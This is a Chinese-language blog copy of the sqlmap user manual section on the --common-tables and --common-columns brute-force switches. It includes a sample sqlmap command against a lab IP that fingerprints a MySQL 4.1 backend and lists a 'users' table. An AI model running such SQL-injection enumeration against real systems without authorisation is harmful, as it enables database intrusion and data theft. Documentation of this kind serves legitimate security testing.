用法-暴力-sqlmap用户手册-测试-IT技术博客

暴力

这些开关可用于运行暴力检查。


暴力表名称

开关:--common-tables


在某些情况下,不能使用switch --tables来检索数据库的表名。这些情况通常属于以下类别之一:


数据库管理系统是MySQL <5.0,其中information_schema不可用。

数据库管理系统是Microsoft Access,系统表MSysObjects不可读-默认设置。

会话用户没有针对存储数据库方案的系统表的读取特权。

如果前两种情况中的任何一种适用,并且您提供了--tables开关,则sqlmap将提示您一个问题,以退回到该技术。这两种情况均适用于您的情况,如果为它提供了--common-tables开关,则sqlmap仍可能会识别一些现有表。 sqlmap将执行暴力攻击,以检测整个DBMS中是否存在公用表。


常用表名称的列表是txt / common-tables.txt,您可以根据需要进行编辑。


针对MySQL 4.1目标的示例:

$ python sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --commo\
n-tables -D testdb --banner
[...]
[hh:mm:39] [INFO] testing MySQL
[hh:mm:39] [INFO] confirming MySQL
[hh:mm:40] [INFO] the back-end DBMS is MySQL
[hh:mm:40] [INFO] fetching banner
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS operating system: Windows
back-end DBMS: MySQL < 5.0.0
banner:    '4.1.21-community-nt'
[hh:mm:40] [INFO] checking table existence using items from '/software/sqlmap/tx
t/common-tables.txt'
[hh:mm:40] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 8
[hh:mm:43] [INFO] retrieved: users
Database: testdb
[1 table]
+-------+
| users |
+-------+

暴力列名称

开关:--common-columns


对于每个表,在某些情况下,不能使用switch --columns来检索数据库的表的列名。这些情况通常属于以下类别之一:


数据库管理系统是MySQL <5.0,其中information_schema不可用。

数据库管理系统是Microsoft Access,其中系统表内部不提供此类信息。

会话用户没有针对存储数据库方案的系统表的读取特权。

如果前两种情况中的任何一种适用,并且您提供了--columns开关,则sqlmap将提示您一个问题,以退回到该技术。这两种情况均适用于您的情况,如果为它提供了--common-columns开关,则sqlmap仍可能会标识一些现有表。 sqlmap将执行暴力攻击,以检测整个DBMS中是否存在公共列。


常用表名称的列表是txt / common-columns.txt,您可以根据需要进行编辑。


标签: sqlmap教程sqlmapsqlmap手册用户手册sqlmap用户手册